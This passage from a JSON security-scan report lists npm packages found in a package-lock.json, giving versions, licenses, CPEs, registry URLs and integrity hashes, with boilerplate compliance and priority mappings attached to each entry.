Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6c276e4fe79d17b1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: side-channel-weakmap 1.0.2", "title": "side-channel-weakmap 1.0.2", "description": "Package discovered: side-channel-weakmap 1.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3a35b0f8b53bc97a", "name": "side-channel-weakmap", "version": "1.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:side-channel-weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel-weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel_weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel_weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/side-channel-weakmap@1.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz", "integrity": "sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A==", "dependencies": { "call-bound": "^1.0.2", "es-errors": "^1.3.0", "get-intrinsic": "^1.2.5", "object-inspect": "^1.13.3", "side-channel-map": "^1.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8acef3cde3b7b132", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: signal-exit 4.1.0", "title": "signal-exit 4.1.0", "description": "Package discovered: signal-exit 4.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a63ea3d2efb32143", "name": "signal-exit", "version": "4.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:signal-exit:signal-exit:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:signal-exit:signal_exit:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:signal_exit:signal-exit:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:signal_exit:signal_exit:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:signal:signal-exit:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:signal:signal_exit:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/signal-exit@4.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9476a789ac7d80fb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: simple-swizzle 0.2.4", "title": "simple-swizzle 0.2.4", "description": "Package discovered: simple-swizzle 0.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "cef7b2b2b70b3db8", "name": "simple-swizzle", "version": "0.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:simple-swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:simple-swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:simple_swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:simple_swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:simple:simple-swizzle:0.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:simple:simple_swizzle:0.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/simple-swizzle@0.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/simple-swizzle/-/simple-swizzle-0.2.4.tgz", "integrity": "sha512-nAu1WFPQSMNr2Zn9PGSZK9AGn4t/y97lEm+MXTtUDwfP0ksAIX4nO+6ruD9Jwut4C49SB1Ws+fbXsm/yScWOHw==", "dependencies": { "is-arrayish": "^0.3.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ff9098f7bbabdf5b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: socket.io 4.8.3", "title": "socket.io 4.8.3", "description": "Package discovered: socket.io 4.8.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5cc521e50bb4314d", "name": "socket.io", "version": "4.8.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:socket:socket.io:4.8.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/socket.io@4.8.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/socket.io/-/socket.io-4.8.3.tgz", "integrity": "sha512-2Dd78bqzzjE6KPkD5fHZmDAKRNe3J15q+YHDrIsy9WEkqttc7GY+kT9OBLSMaPbQaEd0x1BjcmtMtXkfpc+T5A==", "dependencies": { "accepts": "~1.3.4", "base64id": "~2.0.0", "cors": "~2.8.5", "debug": "~4.4.1", "engine.io": "~6.6.0", "socket.io-adapter": "~2.5.2", "socket.io-parser": "~4.2.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a08d32cd24a38070", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: socket.io-adapter 2.5.6", "title": "socket.io-adapter 2.5.6", "description": "Package discovered: socket.io-adapter 2.5.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "423a38d81e2dc8e3", "name": "socket.io-adapter", "version": "2.5.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:socket.io-adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io-adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io_adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io_adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io:socket.io-adapter:2.5.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io:socket.io_adapter:2.5.6:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/socket.io-adapter@2.5.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.5.6.tgz", "integrity": "sha512-DkkO/dz7MGln0dHn5bmN3pPy+JmywNICWrJqVWiVOyvXjWQFIv9c2h24JrQLLFJ2aQVQf/Cvl1vblnd4r2apLQ==", "dependencies": { "debug": "~4.4.1", "ws": "~8.18.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "126bbc6e6f7db2d9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: socket.io-client 4.8.3", "title": "socket.io-client 4.8.3", "description": "Package discovered: socket.io-client 4.8.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ecd3152d103ea0f9", "name": "socket.io-client", "version": "4.8.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:socket.io-client:socket.io-client:4.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io-client:socket.io_client:4.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io_client:socket.io-client:4.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io_client:socket.io_client:4.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io:socket.io-client:4.8.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:socket.io:socket.io_client:4.8.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/socket.io-client@4.8.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/socket.io-client/-/socket.io-client-4.8.3.tgz", "integrity": "sha512-uP0bpjWrjQmUt5DTHq9RuoCBdFJF10cdX9X+a368j/Ft0wmaVgxlrjvK3kjvgCODOMMOz9lcaRzxmso0bTWZ/g==", "dependencies": { "@socket.io/component-emitter": "~3.1.0", "debug": "~4.4.1", "engine.io-client": "~6.6.1", "socket.io-parser": "~4.2.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4e07aea60237064a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: socket.io-parser 4.2.6", "title": "socket.io-parser 4.2.6", "description": "Package discovered: socket.io-parser 4.2.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f9190921d6308e46", "name": "socket.io-parser", "version": "4.2.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:socket:socket.io-parser:4.2.6:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/socket.io-parser@4.2.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/socket.io-parser/-/socket.io-parser-4.2.6.tgz", "integrity": "sha512-asJqbVBDsBCJx0pTqw3WfesSY0iRX+2xzWEWzrpcH7L6fLzrhyF8WPI8UaeM4YCuDfpwA/cgsdugMsmtz8EJeg==", "dependencies": { "@socket.io/component-emitter": "~3.1.0", "debug": "~4.4.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1381d8de85a9f426", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: source-map-js 1.2.1", "title": "source-map-js 1.2.1", "description": "Package discovered: source-map-js 1.2.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ef14348a3e7aef73", "name": "source-map-js", "version": "1.2.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:source-map-js:source-map-js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:source-map-js:source_map_js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:source_map_js:source-map-js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:source_map_js:source_map_js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:source-map:source-map-js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:source-map:source_map_js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:source_map:source-map-js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:source_map:source_map_js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:source:source-map-js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:source:source_map_js:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/source-map-js@1.2.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz", "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8a8949f600357d51", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: standard-as-callback 2.1.0", "title": "standard-as-callback 2.1.0", "description": "Package discovered: standard-as-callback 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ae42b44f62499323", "name": "standard-as-callback", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", 